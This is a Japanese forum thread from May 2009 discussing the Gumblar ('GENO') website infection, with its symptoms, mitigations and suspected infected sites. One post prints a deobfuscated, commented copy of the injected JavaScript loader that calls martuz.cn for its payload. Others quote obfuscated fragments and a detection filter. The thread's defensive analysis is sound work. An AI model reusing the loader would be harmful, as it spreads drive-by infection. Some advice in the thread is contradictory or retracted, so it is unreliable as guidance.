オレはグーグル クロムで勝ち組だわw

647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:12 ]
Seamonkeyもやばいの?

648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:43 ]
>>644
うん知ってるよ
で?他のブラウザは?

649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:43 ]
>>639
特に区別無くどちらも対象にされてるからどっちが安全とか無いよ
今でこそ判定文付けてるけど、そのうち全ての環境で感染できるか試すようになるかもね

650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:15 ]
>>640
お前の自慢のFWで>>324を全部踏んできてもらおうか



651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:37 ]
>>649
ここ数日見てると何かそれくせえ。

652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:38 ]
JavaScript切ったら、Google先生の検索結果に出てた
安全サイト確認ロゴも消えてしまった

653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:59 ]
>>650
全部踏んできたお

654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:14 ]
バージョンに関してはまとめとかに書いといてもしょうがないんだよな。
いつ更新されるかわからないんだし。

655 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:52:19 BE:1503380148-PLT(12500)]
ドメイン的に発信源は中国と思ってたんだけど
中国じゃないの?
ちなみにgumblar.cnはもう死んでるからいまさらこのドメインブロックしても意味ないんだよね

656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:22 ]
なんだなんだ
結局GoogleChromeが最強のブラウザ決定?

657 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:52:32 ]
>>631
参考にしてみる
ありがとう

658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:34 ]
>>645
ほかの人うつす可能性があるだけで事実上無害
気にするだけ損なウィルス

659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:03 ]
>>641
おお、そうなのか。複数出てくるのは普通なのか。
サイズが違うのはやっぱりまずい?

660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:25 ]
>>656
Netscape



661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:37 ]
>>655
gumblar.cnの設置場所はロシアだけど、犯人(グループ)がどこにいるかは
わからんね。

662 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:42 ]
Vista用のテンプレもなかったっけ?
どこいった?

663 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:53:43 ]
>>650
同じくFWだけで踏んできたが何か?

664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:55 ]
>>655
別にドメインが中国でも実際に使ってるのは中国人じゃない可能性はあるだろ

665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:57 ]
>>658
豚インフルに似てるな

666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:08 ]
いつ攻撃法をJavaScriptからActiveXへ変えるのだろうか

667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:16 ]
サイト側が感染する時って
どういう仕組みで感染するんですか?

668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:23 ]
知ってる範囲で感染サイトまとめくれ
ν速じゃ4Gamerとか痛いニュースやYourFilehostが感染だの憶測が飛びまくってて分からん

669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:31 ]
いつになったらおさまるのだろうか
対策はしているがまた亜種が出てきたらどうしようかとか色々考えてしまう

670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:55:31 ]
>>667
スクリプト踏んで感染したPCからftpパスワードを抜かれる



671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:55:52 ]
最新の検体だとF-Secureひっかからないのか…
とりあえずSASに記録しとくか…

672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:56:33 ]
ノートンじゃ反応しないらしいからオンラインスキャンしたいんだけどどこ使えばいいのか

673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:05 ]
火スペ!

674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:10 ]
>>658
え・・・?

675 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:26 ]
>>658
* コマンドプロンプトを実行中ではないのにcmd.exeが起動している
* cmdやregeditが起動しない(Explorerが落ちる)
* 特定のサイトに接続できなくなる
* ブラウジングがまともにできない
* Adobeが5分に1回のペースで更新を要求してくる
* CPUの稼働率が何も作業していないのに50%近くに上がる(CPUのコア数によって違う)

こんな症状が報告されてるがな

愚痴。
判りもしないで騒ぐなって馬鹿いるけど、だったらウイルスの挙動を完全に解析してくれ。
それができない・亜種が発生し続けてるから何されるか完全に把握できないってのに。

676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:26 ]
>>648
Chromeにはあるんじゃね?

677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:54 ]
>>972
カスペルスキー
www.kaspersky.co.jp/virusscanner
感染してたらこれが検出
dec.2chan.net:81/may/b/src/1242482913269.jpg

678 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:58:06 ]
fc2ブログ見れなくなった…
俺だけでしょうか?

679 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:24 ]
search.chiebukuro.yahoo.co.jp/search/search.php?flg=3&p=eval+unescape
HTMLにいつのまにか謎の文字列が挿入されています。 ...2fsc:72ipt:3e:22):3b:7d';
var Mdpko=FPCN.replace(Y3n5P,MRfH);eval(unescape(Mdpko))})(/:/g); --></script>
ヨミサーチを設置後、htmlソースがおかしくなりました。 スクリプト記述部が
<script language=javascript><!-- (function(t){eval(unescape


感染広がりまくりwwwwwうぇwwwwwww

680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:32 ]
var j = "", u = navigator.userAgent;

if(
     (u.indexOf("Chrome")<0) &&      //Chrome以外ならtrue
     (u.indexOf("Win")>0) &&        //Windowsならtrue
     (u.indexOf("NT 6")<0) &&       //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
     (document.cookie.indexOf("miek=1")<0) &&
     (typeof(zrvzts)!=typeof("A"))
){
     zrvzts="A";
     if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
          j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ)
     }
     document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね



681 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:33 ]
一週間くらいでワクチン対応くるかな

682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:37 ]
>>672
オンラインスキャンでも最新亜種は検出しないよ。
検体を提出してもクリーン判定されちゃうもの。

683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:00:19 ]
>>672カスぺとかじゃない…
なんかもうどのソフトも後手後手だから、予防対策とっておとなしくしてるわ…
亜種出まくりだし。
なんか変な感じするなぁ。


684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:00 ]

恐らくワクチンが出来るまでに>>681はあぼーんする可能性99.8%

685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:00 ]
>>675
UPX解凍しても中身が全部見えない
u.batの挙動は海外サイトで纏められてるが、残念ながら不明

686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:01 ]
夜になって急に騒がしくなってきたな

687 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:01:18 BE:1127535146-PLT(12500)]
>>664
中国人が発信源じゃなくて、中国が発信源と思ってたの

688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:30 ]
コキントーとかの私用パソコンが感染したらどうなるんだろか?

犯人が中国人だったら死刑だろーなw

689 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:54 ]
そりゃまあ対策ソフトなんだし先手はありえんな

690 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:10 ]
OperaでJS、Java、FlashとReaderのプラグインを切る、これ最強



691 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:13 ]
>>675
亜種っていっても、FlashとPDFの脆弱性を利用しているという点ではずっと一貫してると思うんだが。
だから呼びかけられてる予防方法はずっと変わってないだろ。

つーかそこに挙がってる症状は、とりあえず感染の目安になるってだけじゃないのか。
問題はトロイを仕込まれるってとこなんじゃないか?

692 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:31 ]
少なくともGENOで確認されて一月経過してて、他所ではもっと前から感染してるのに、
一向に対策が進まない現状

693 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:36 ]
もうわけわからん

694 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:02:37 ]
これ外国でも騒ぎになってるのか?

695 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:38 ]
UACの偉大さ

696 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:52 ]
>>675
とくに深刻な症状でもないね
気にするだけ無駄ってのが正解かも
キンタマで人生終わるとかじゃないからw

697 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:54 ]
fc2はfc2ブログだけじゃなく、fc2.comも開けなくなってるな。
fc2.comの管理者が食らってメンテ中か?

698 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:06 ]
>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。

699 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:17 ]
>>687
www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
 ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。

700 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:40 ]
>>635
IE8でも、検索サイトをGoogleに設定しているとそうなるらしいけど、
俺は怖くて試していない



701 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:44 ]
>>678
同人板でも話題になってた
いつものことなのかそうでないのかの判断がつかない状況

702 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:00 ]
なんか火消しに奔走する奴が出始めたな
どこかの関係者か?

703 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:19 ]
ソースチェッカーオンラインが「アクセス規制中です 現在、大規模な攻撃を受けており」だってさ
同人板の連中が殺到してんだな・・・乙

704 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:53 ]
そもそも犯人の目的は何なんだ?

705 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:12 ]
>>704
おまいのアナル

706 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:12 ]
GENOの人居るんでしょ?
ちゃんと責任取ってよね
キャッシュ消せば大丈夫とかよくも大嘘こいてくれたな

707 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:41 ]
>>704
Vistaの普及

708 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:47 ]
ブルスク気にしないのか

709 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:48 ]
genoはどんどん名が売れていくな
よかったじゃんw

710 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:52 ]
とにかくjs切ってサイト閲覧してれば大丈夫ってことだよね?



711 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:01 ]
>>704
目的の一つはアフィ。
検索結果のリンク先を書き換えるらしい。

712 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:10 ]
同人同人騒いでるのってあの人でしょ

713 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:06:14 ]
結局vistaなら大丈夫なの?

714 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:45 ]
>>707
俺すでにびすたんだよ

715 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:06:59 ]
>>695
この間仕方なしにVistaに変えたけどそれオンにしていたら
どんな警告出るの?

716 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:34 ]
>>710
今のところはね。
いつまでもjavascriptだけとは思えないけどね。
javascriptのバージョン判定部分なんかも書き方変わってきてるし。

717 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:35 ]
>>696
ゾンビになって犯罪に加担することになります
ある日警察がきます

718 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:40 ]
>>704
大規模なボットネットを手に入れるためじゃない
その手の世界では結構な高額で売れるんだとか

GENOウイルス自体は感染を広める為だけの物だから解釈によっては無害とか言うことも可能なんだろう
でもゾンビ化してるから後から遠隔操作で何されるかはわからん

719 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:44 ]
>>706
          /)              □
           ///)      □
          /,.=゙''"/            □
   /     i f ,.r='"-‐'つ____   角砂糖3個やろう
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


720 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:47 ]
>>711
もしそうなら(相手が大規模な詐欺グループでないなら)簡単に身元割れるんじゃね?



721 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:47 ]
chromeも>>635みたいに弾いてくれるのか?

chromeはjs不許可にできないから試せない・・

722 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:55 ]
>>713
UAC切ってるならXP同様感染する

723 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:09 ]
とうぶんフラッシュは見ないことにしようと思ったんだが、
よく考えるとおとついadobeのフラッシュプレーヤー更新したとき以外
ここんとこ全然見る機会なかったわ。

捨ててもいい気がしてきたw

724 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:25 ]
いやもうGENO潰れろよ
恨みを一身に背負ってさ

725 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:30 ]
>>704
botnetのゾンビ集め

で、そのnetを時間貸しでレンタルして金稼ぎ、らしい

726 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:34 ]
47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ

727 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:37 ]
ノートン先生まだ寝てるんだぜ?

728 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:08:38 ]
感染サイトまとめとかないの?

729 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:50 ]
UACって何

730 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:05 ]
>>689
○○最強!なーんて言ってる場合じゃないなって…
>>691
進まないな…不便になるのが嫌なのは分かるけどさ…
仕事で諸々をアップデート出来ないって人は大変だ。



731 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:29 ]
>>726
それ確定情報ねーだろ

732 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:32 ]
>>691
そうだよ、だから

簡潔に>>530だけを>>1に書いとけばいいだけ

馬鹿がテンプ色々付加するから混乱するんだよな

理解しきれてないから長文でしか説明できない馬鹿がスレタテるとこうなる。

ちなみに>>530はおれが書いた

733 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:33 ]
故意にデマを広めると検挙されるケースもあるから注意な

734 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:45 ]
Scriptからの挙動による対策
・ Google Chromeを使う
・ Windows以外のOSを使う
・ Windows Vista以降のOSを使う
・ cookieをオフにする
・ JavaScriptをオフにする
・ Adobe Readerを使わない

これのどれかを行えば今のところ感染しない

735 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:46 ]
>>722
少なくとも現時点で明らかになっているスクリプトではVistaとChromeは
除外してるよ。

736 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:48 ]
>>723
動画サイトいかないならおkじゃね

737 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:10 ]
>>716
サンクス。
Geno騒動初期に手に入れたオミトロンのフィルタが
機能するかどうか試したんだけど、アラートはでなかった。
JsOffでも機能するよね?

[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"


738 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:22 ]
中華のサイバーテロ演習

739 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:24 ]
>>732
ゆとり乙
火消しのつもりか?

740 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:27 ]
とにかく家族や他人様に迷惑かけないように
ネットを切って働いて自立するべきだな



741 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:57 ]
>>740
夜勤は来週からだ

742 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:00 ]
>>728
ネットしなけりゃOK

743 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:11 ]
あと、プニルで見たんだが、ちゃんとGoogleからの警告があったよ。
IE8でも警告されると思うが、念のためjs切ってみたほうがいい。

744 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:33 ]
Vista使ってて初めて良かったと思った

745 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:34 ]
GENOの対応はたしかに酷いが、ここまで広がってるのはもうGENO関係ないと思うぞ。
どっちかっていうとアップデートしてない人がこんなにいるのかって驚き。

746 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:01 ]
>>737
document.writeの直後、unescapeのパターン以外にもいくつかあるよ。

747 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:12:06 ]
amazonが感染したとかどっかで見たけど流石にデマだよなー

748 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:08 ]
>>740
お願いだからお仕事休んでね!って会社が言うんだよお

749 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:30 ]
>>734
Cookieは関係ないです、勘違いだった。

750 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:31 ]
>>745
関係なくはない
小林みたいにしっかりと「ウィルスでしたごめんなさい」とすぐに書けば
感染した奴もすぐ対応できた



751 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:12:34 ]
>>739

なんのための火消し?

中傷は反論じゃないですよ。

具体的にどうぞ。

752 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:42 ]
>>743
ドメイン変わってスルーされてるって話だけど、どうかな

753 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:06 ]
47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ


これって本当?

754 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:24 ]
こんなの全然問題じゃねえだろ!って情弱が逆切れし始めてんな。
PCにどれだけ飼ってるのか興味深い

755 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:33 ]
www.kingsoft.jp/
ここも感染した?

756 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:37 ]
>>743
googleから検索して開けばブロックされるに決まってるだろアホか
問題なのは普段見ているサイトが感染したとしてブックマークとかから直接アクセスした場合
firefoxはgoogleのDBから随時リストを更新している
chromeはどうなんだ

757 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:11 ]
>>755
お前もういい加減にしろ

758 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:16 ]
>>752
Googleが危険判定したら別ドメインに逃げてるっぽいよな。

759 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:16 ]
いつも見ているサイトももしかしたら感染するかもしれないし
気をつけないといけんね

760 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:28 ]
>>751
この改行どっかで見たな
ν速か



761 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:32 ]
Nortonはなんで一向に対応しようとしないの?

762 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:54 ]
>>753
見てみた。感染してない

763 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:00 ]
感染報告無いのに○○が感染してるって本当?という質問ずっと続ける奴はアレだな・・・

764 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:12 ]
先生は忙しいんだよ

765 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:16 ]
>>745
へー

なんでキャッシュ消せば大丈夫とか書いちゃったの?

766 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:23 ]
レジストリエディタの編集をしようとすると落ちる症状
(立ち上がるがkeyの変更をしようとすると落ちてた)が連発してたが、
まさかこれの亜種だったのだろうか。

NET.FRAMEワークのパッチあてて直ったんだよな。

767 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:32 ]
>>761
国内担当が土日でお休みだからじゃね

768 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:48 ]
>>761
たぶんエンジンに手を入れない限りシグネチャで対応しきれないから。

769 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:54 ]
GENO社員が火消しに降臨したか

770 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:15:58 ]
・感染したらクリーンインスール
・予防はFlashとReaderを最新版に。


2行で済む話をなんで永遠8スレ消費してやってんの??


 



771 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:58 ]
GENOは関係あるよ
そのままキャッシュ消して普通にネットしてる人だっていただろうしさ

772 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:59 ]
>>746
それじゃあアラートでないはずだ。

773 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:16:08 ]
>>761
センセイは職場放棄しましたOTL


774 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:16:36 ]
>>745

775 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:16:58 ]
先生ならさっきもう食べられないよーとか寝言言ってたぜ
早く起きていっぱい食えよコノヤロウ

776 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:00 ]
GENOのせいだろどう見ても。ショップ閉鎖するべき。
パソコン直す店やったとしてもパソコンにコード仕込まれたら意味ないしなw

777 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:02 ]
バスターも土日休みだっけ

778 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:03 ]
>>761
先生は今敵に昏睡状態にされてるんだよきっと

779 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:07 ]
>>770
・感染サイトが増え続ける一方だから
・亜種が出てきたから
・GENOが火消ししようとするから

780 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:14 ]
>>729

ユーザーアクセスコントロールだ。




781 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:33 ]
reader更新しときゃいいんだよ

次スレいらないね

782 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:34 ]
>>770
その2行がいつ無効になるか解らないからみんな常駐してるんだろ
インフルエンザと同じだ

783 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:51 ]
>>761
先生なら今俺の隣で寝てるぜ

784 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:07 ]
つか、Flash関係ないし・・

785 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:08 ]
おいwww新型インフルと、GENOスレを同時に見てるとこの先地獄しか想像できないんだがwww

786 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:14 ]
時限式とかないよね?ね?

787 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:25 ]
VMwareでリボンマジックとwww■senlights■co■jp/seihin/kirenaru-1s■htmを踏んでみた
リボンマジックの方はなんともなかったが、後者のサイトはPDFリーダーの起動とウイルスサイトへのアクセスを確認した。

788 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:34 ]
>>770
馬鹿だろお前

789 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:36 ]
>>761
バスケがしたいですぅ・・・・

790 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:40 ]
>>782
感染したら〜はハードウェア破壊されない限りどのウィルスでも有効だと思う
そもそも対処法じゃないけど



791 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:54 ]
>>786
ありますん

792 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:55 ]
>>785
外に出ても感染
家の中でも感染

793 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:00 ]
なんか「I LOVE YOU」メール依頼の大流行になりそうな悪寒

794 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:07 ]
google preview入れてるとサムネで教えてくれるんだな
びびったわ

795 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:23 ]
わしが育てた

796 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:31 ]
>>761
先生を解放してあげようよ

797 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:37 ]
>>782
経過観察って重要なんだな…


798 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:44 ]
>>786
時限式と言うか、遠隔操作してるとこからいつでも弄れるからな。
いつ「始める」かは犯人次第なわけだ。

意味わかるよな?

799 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:45 ]
GENO関係者が必死に火消しするのはなぜ?

800 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:54 ]
二次元に逃げるしかないな



801 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:20:44 ]
男に逃げるしかないな

802 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:20:51 ]
>>793
2ちゃんに書き込むとノートン先生が飛び起きる魔法のコードですね

803 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:09 ]
>>800
それだ!

804 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:26 ]
>>753
今見てきたけど、それらしい痕跡は無かったけどな。

805 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:30 ]
ドリクラの宣伝禁止

806 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:21:38 ]
>>788

馬鹿の理由を

みんなに伝わるようによろしく。

おまえよりはましだと思うけど。

807 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:56 ]
F-Secure Security Labs から
Thanks, we're publishing detection shortly.
って回答

808 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:23 ]
宣伝効果絶大だわ
ちっとまえまでGENOなんて知らなかったよ

809 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:26 ]
ワトソン博士を忘れちゃいないか?

810 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:27 ]
GENOの社員なんかじゃないよ、実際GENOの対応は酷いって書いただろ。
だけどGENOは責任なんかとっちゃくれないし、クリーンインストールしたりして損すんのは自分じゃんか。
ふだんから気をつけておくのにこしたことはないのにねって話したかっただけだよ。すまんね。



811 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:03 ]
>>810
「関係ない」って書いたからあれだったんだろうね。

